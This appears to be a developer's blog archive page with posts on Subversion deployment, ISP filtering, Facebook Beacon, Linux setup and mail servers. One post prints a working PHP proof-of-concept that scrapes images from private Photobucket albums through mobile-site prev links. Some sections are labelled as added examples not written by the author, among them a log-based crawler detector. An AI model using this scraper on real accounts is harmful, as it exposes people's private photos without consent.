Joey Adams Dot Net

Southern Fried Programming


Archive for the ‘Uncategorized’ category


SupermanDatHo: Soulja Boy got hacked

Yes… that was his password.

I’m not blogging on this much, because all it was was someone guessing his password, which is quite hilarious nonetheless.

Anyway, at the end of the video he posted, he calls out hackers, wanting to make an example of this one. Let’s just say it is not wise to mess with people who can take your life away in this digital age; just ask the owner of LifeLock how that works out for you.

Subversive Development for the Serious Web Professional

I won’t go into detail explaining version control, because there are countless articles and papers in the wild about it. I am, however, going to explain how I am integrating Subversion into my current development environment.

First, my reasons for using version control:

  • No SPOF (single point of failure) - my flow always has 3 concurrent copies of the source at any given point, so if one machine fails fatally, my project data is still safe.
  • Repository - having a repository means I can revert to older versions if needed, as well as keep up with the changes made at each step along the way.
  • No direct editing - I never have to touch the staging or live servers; I only modify the development copy, so human error is reduced ten-fold.

Here is how it all works.

I have 3 machines, dev/repo/serv, where dev is my development workstation, repo is the machine hosting the Subversion repository, and serv is my HTTP server.

On the HTTP server, in my projects directory, there is a folder for each project I am working on. Inside each project folder there are 3 other folders: dev/staging/live.

Using virtual hosts on the HTTP server (serv), I make the development folder accessible only from my local network, the staging folder is password protected, and the live folder is publicly available.

I use Zend Studio for Eclipse with a Subversion/PHP project and use WebDrive to securely map the project’s dev folder onto my local machine. I create/edit/modify project files from my workstation (which holds a cache of the project files) in the dev folder on my HTTP server.

I edit files from my workstation and view the changes on the development vhost. Once I finish adding a module/functionality/milestone to the project and want the client’s approval, I use a script called svn_sync.sh located in each project’s main directory.

svn_sync.sh first makes sure you have committed your changes to the trunk (aka the dev folder); after that you specify which source you want to merge and update. Once I finish adding features, I merge the trunk into the staging branch and update the working copy inside the staging folder. I can now show the client the changes.

Once I have his approval, I run svn_sync.sh again and have it merge the staging branch into the live branch, then update the live directory, aka the live server.
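
The flow above as a shell script, written here as an added example; it is not the author’s svn_sync.sh, and the repository URL, the project folder path and the branch layout (trunk for dev, branches/staging, branches/live) are assumptions. The two status checks are what turn the “commit first” and “no direct editing” rules into something the script enforces rather than something you have to remember.

```shell
#!/bin/sh
# Reconstruction of the svn_sync.sh flow described in the post (added example, not
# the author's script). Assumed layout: the repository holds trunk/ (the dev folder),
# branches/staging and branches/live, and the http server keeps a working copy of
# each under $PROJECT_DIR/dev, $PROJECT_DIR/staging and $PROJECT_DIR/live.

REPO_URL="${REPO_URL:-http://repo.example.net/svn/myproject}"   # assumed repository URL
PROJECT_DIR="${PROJECT_DIR:-/var/www/projects/myproject}"       # assumed project folder
SVN="${SVN:-svn}"

# Repository URL for a folder name (dev is the trunk).
branch_url() {
    case "$1" in
        dev)     echo "$REPO_URL/trunk" ;;
        staging) echo "$REPO_URL/branches/staging" ;;
        live)    echo "$REPO_URL/branches/live" ;;
        *)       echo "unknown folder: $1" >&2; return 1 ;;
    esac
}

# Only dev may feed staging and only staging may feed live, so nothing reaches the
# live server without having been shown on staging first.
valid_step() {
    case "$1/$2" in
        dev/staging|staging/live) return 0 ;;
        *)                        return 1 ;;
    esac
}

# True when `svn status` output (passed as $1) shows uncommitted work: an item
# status of M/A/D/R/C/! in column 1 or a property change (M) in column 2.
# Unversioned files (?) are ignored; they were never part of the trunk.
has_uncommitted() {
    printf '%s\n' "$1" | grep -Eq '^([MADRC!]|.M)'
}

# Merge $1 into the $2 working copy, commit the merge, then bring that working
# copy (the folder the vhost serves) up to the new HEAD.
promote() {
    src="$1"; dst="$2"
    valid_step "$src" "$dst" || { echo "refusing $src -> $dst" >&2; return 1; }
    src_url=$(branch_url "$src") || return 1
    dst_wc="$PROJECT_DIR/$dst"

    # First step of the post's script: everything must already be committed to trunk.
    dev_status=$("$SVN" status "$PROJECT_DIR/dev") || return 1
    if has_uncommitted "$dev_status"; then
        echo "commit your changes to trunk (dev) first" >&2
        return 1
    fi
    # A hand edit in staging or live would be folded into the merge; refusing it
    # is what enforces the "no direct editing" rule.
    dst_status=$("$SVN" status "$dst_wc") || return 1
    if has_uncommitted "$dst_status"; then
        echo "$dst working copy has local changes; edit only in dev" >&2
        return 1
    fi

    "$SVN" merge "$src_url" "$dst_wc" &&
    "$SVN" commit -m "svn_sync: merge $src into $dst" "$dst_wc" &&
    "$SVN" update "$dst_wc"
}

# Usage: ./svn_sync.sh dev staging   and, after client approval,   ./svn_sync.sh staging live
if [ $# -eq 2 ]; then
    promote "$1" "$2"
fi
```

The script runs `svn merge` inside the target working copy and commits the result, which is how a Subversion merge is recorded; the final `svn update` is what the post calls updating the working copy, and it is the step that actually changes what the staging or live vhost serves.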

That is my SDLC (software development life-cycle). Things are neat and tidy, and I only make changes to the trunk/development folder of the project.

This method is everything I could wish for: highly available, reliable, robust, scalable, and professional.

Sure, direct editing and copy -r work, and I may be overdoing it as a single developer, but I am very happy with my results and would recommend the same to anyone wanting the experience.

Web Application Security Survey

It is unarguable that Jeremiah Grossman is a pretty big name in web application security. I really enjoy reading his and Robert (aka Mr. XSS, RSnake) Hansen’s posts. They tend to have a lot of great info and a lot of fun things to be a part of.

Jeremiah has his W.A.S. survey up for anyone who works around the field to take. Some of the questions are really inquisitive.

Anyway, if you work around the field, you should take the survey. Head on over to his site to take it.

View private Photobucket accounts via Mobile-Web

Photobucket has done it again. It appears that on the mobile-web domain (m55.photobucket.com), if you navigate to a valid image, you can use the previous/next links to view more photos in the account, even if it is set to private.

I have not checked, but I believe the hole has been patched. I was informed of this exploit by a friend, Jessie McKnight. The catch was that the prev/next buttons are initially very small (hence mobile web), and clicking all those links takes a lot of time.

I hacked up a working script in about an hour that takes a valid picture URL and visits it, scrapes the previous link, copies the image name and writes it encapsulated in an image tag to an HTML file using the original Photobucket URL (not the mobile domain), then repeats this process on the URL obtained from the prev anchor.

This was a very intensive process, so I capped it at 50 requests, and storing the pictures on a separate page allowed for quicker retrieval while the script was crawling, and also for saving the results of different people using the script at the same time.

This is in no way an optimized script; it was thrown together from scratch to completion in under an hour, but it is just a P.O.C.

<form method="GET" action=''>
URL TO VALID PICTURE: <input type='text' name='album'><br/>
<input type='submit'>
</form>

<?php

if(isset($_GET['album'])){
    // Results are appended to a separate page so they survive across runs and users.
    $fh = fopen('photos.html','a');
    $get_album = $_GET['album'];
    // Split the full picture URL into the file name and the album URL it lives under.
    $picture = substr(substr($get_album,strrpos($get_album,'/')),1);
    $albumurl = substr($get_album,0,strrpos($get_album,'/'));
    $album = substr(substr($albumurl,strrpos($albumurl,'/')),1);
    // Starting point on the mobile-web domain.
    $url = "http://m55.photobucket.com/albumview/albums/{$album}/{$picture}.html?";
    $i=0;
    // Request cap: each iteration is one HTTP request to the mobile site.
    while($i <= 100){
        $url = getPrevUrl($url);
        $im = getImage($url,$albumurl);
        fwrite($fh,$im);
        echo $im;
        $i++;
    }
    fclose($fh);
}

// Fetch the mobile page and return the URL behind its "previous" link
// (anchor index 4 of the matches, which is where the mobile layout placed it).
function getPrevUrl($url){
    // Double quotes so $url is interpolated into the error message.
    $input = @file_get_contents($url) or die("Could not access file: $url");
    $regexp = "<a\s[^>]*href=(\"??)([^\" >]*?)\\1[^>]*>(.*)<\/a>";
    if(preg_match_all("/$regexp/siU", $input, $matches)) {
        $photoUrl = "http://m55.photobucket.com" . $matches[2][4];
        return $photoUrl;
    }else{
        // No anchors found: stay on the same URL.
        return $url;
    }
}

// Turn the mobile page URL back into an <img> tag pointing at the original photo URL.
function getImage($url,$alburl){
    $photoUrl = substr($url,0,strrpos($url,"."));
    $photoUrl = substr($photoUrl,strrpos($photoUrl,"/"));
    $photoUrl = $alburl . $photoUrl;
    // Escape before writing into HTML; part of this value came straight from the query string.
    return "<img src='" . htmlspecialchars($photoUrl, ENT_QUOTES) . "'/><br/>";
}
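
From the defender’s side, the traffic this kind of script produces (one client walking photo after photo of a single album, far faster than anyone clicking tiny prev links) stands out in an access log. The script below is an added example, not from the post and not Photobucket’s; the log lines are constructed, and the /albumview/albums/<album>/<photo>.html path layout simply follows the URL format the P.O.C. uses.

```shell
#!/bin/sh
# Added example, not from the post: spot a client that walks through an album
# photo by photo on the mobile-web host. Log lines are constructed; the
# /albumview/albums/<album>/<photo>.html layout follows the PoC's URL format.

THRESHOLD="${THRESHOLD:-20}"   # distinct photos of one album per client before we flag

# Constructed Apache combined-format log: one client fetches 25 photos of one album
# in 25 seconds with no referer and no user agent (file_get_contents sends none);
# a second client views two photos the way a person browsing would.
gen_sample_log() {
    i=1
    while [ "$i" -le 25 ]; do
        printf '198.51.100.7 - - [10/Jun/2008:21:03:%02d -0500] "GET /albumview/albums/holiday/pic%03d.jpg.html HTTP/1.1" 200 812 "-" "-"\n' "$i" "$i"
        i=$((i + 1))
    done
    printf '203.0.113.9 - - [10/Jun/2008:21:05:01 -0500] "GET /albumview/albums/holiday/pic004.jpg.html HTTP/1.1" 200 812 "http://m55.photobucket.com/" "Mozilla/5.0"\n'
    printf '203.0.113.9 - - [10/Jun/2008:21:05:40 -0500] "GET /albumview/albums/holiday/pic005.jpg.html HTTP/1.1" 200 812 "http://m55.photobucket.com/" "Mozilla/5.0"\n'
}

# Read log lines on stdin; print "client album count" for every (client, album)
# pair whose count of distinct photo pages reaches THRESHOLD.
flag_crawlers() {
    awk -v limit="$THRESHOLD" '
        # $7 is the request path; only album photo pages are of interest
        $7 ~ /^\/albumview\/albums\/[^\/]+\/[^\/]+/ {
            split($7, p, "/")              # p[4] is the album name, p[5] the photo page
            if (!(($1, p[4], p[5]) in seen)) {
                seen[$1, p[4], p[5]] = 1   # count each photo once per client
                photos[$1, p[4]]++
            }
        }
        END {
            for (k in photos)
                if (photos[k] >= limit) {
                    split(k, f, SUBSEP)
                    print f[1], f[2], photos[k]
                }
        }'
}

# Usage on a real server: flag_crawlers < /var/log/httpd/access_log
gen_sample_log | flag_crawlers
```

Counting distinct photo pages per client and album, rather than raw requests, keeps a user who reloads the same picture from tripping the threshold; the threshold itself is the same kind of cap the P.O.C. had to impose on itself. Detection like this is a stop-gap: the underlying problem is that the mobile site did not apply the album’s privacy setting to its prev/next navigation, and the fix is that authorization check on every interface that serves the album.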

Major ISPs agree on child pornography filtering.

I have not gone into detail about this agreement, but you can be certain that whenever ISPs band together to prevent something, it hurts the consumer.

Filtering slows down speeds (minutely), but the real flaw in filtering is the use of an uncertain list. Whitelisting or blacklisting, there are ALWAYS false positives when you do not have an exact plain-text match.

I am definitely against child pornography; however, false positives from filtering, and the way some ISPs like to communicate with law enforcement, could cause a myriad of problems for everyday households. Prosecution should be done through cooperation with the web hosting companies that host accounts with this type of content on them. Filtering is not mature enough yet.

For instance, for AT&T customers, even this blog post might be filtered away within the year, just for its title.

Filtering, throttling, anything other than providing direct internet connectivity is a horrible breach of trust and net neutrality. Boo!

WTF Facebook!?

If you haven’t heard about Beacon in Facebook publishing private data, then you have been under a rock. But wait, Beacon is now an opt-out service, so this is old news, right?

Wrong!

According to a post on Slashdot, Beacon still tracks you whether you are logged into Facebook or not. I had high hopes for Facebook, being an advocate of PHP and open source technology, but shame, shame on you, Facebook.

This issue needs more spotlight.

Zend Studio, Fedora Core 9, and my laptop dv8000

I’ve been dying to have a Linux workstation. I have BackTrack 3 installed in a VM on my desktop, but that is not enough. I miss my Gentoo installation and considered it, but it just takes too long and my schedule is more than full.

I cannot change over my desktop OS because I use Media Center for my home PVR (see other posts for details), and also because I game every now and then and use the CS3 suite, so oh well. Dual booting is not worth it when I can work off a VM.

So my laptop is the choice then, with its semi-broken screen and all. I decided to go with Fedora: it’s an easy install, a programmer’s type of distro, and I am familiar with it from the past. I downloaded Fedora 9 Sulphur for amd64; the install was FLAWLESS, just perfect. Boot up, and everything works as it is supposed to.

Zend Studio Fedora 9


AT&T/BellSouth filtering outbound SMTP vs. my Postfix and IIS mail servers

If I have ever spoken to you regarding mail servers, it was probably a frustrating conversation. Mail servers and I just do not get along. I have tried numerous times on all sorts of platforms, from Unix to Linux and Windows, to get sendmail, Postfix, even IIS to work correctly.

Well, as a developer, I need mail functionality in my PHP applications. I would also like my joeyadams.net and other domains to be able to have unique email addresses. I already have a Windows 2003 server set up for file/print and previously mail with Exchange, which actually worked… well, some of the time.

So here is my plan: on my Red Hat box, ditch sendmail and use Postfix. On Win2k3, set up the simple IIS SMTP and POP3 services.


Blog Up

JoeyAdams.net is now home to my blog. I am in the midst of finishing a couple of web applications and getting them marketed; after that I will be working on the startup of a consulting company specializing in Internet security and web development.

From time to time I will post about happenings in the security and web world, as well as articles about security and development related topics.

Check back regularly or syndicate to gain more information.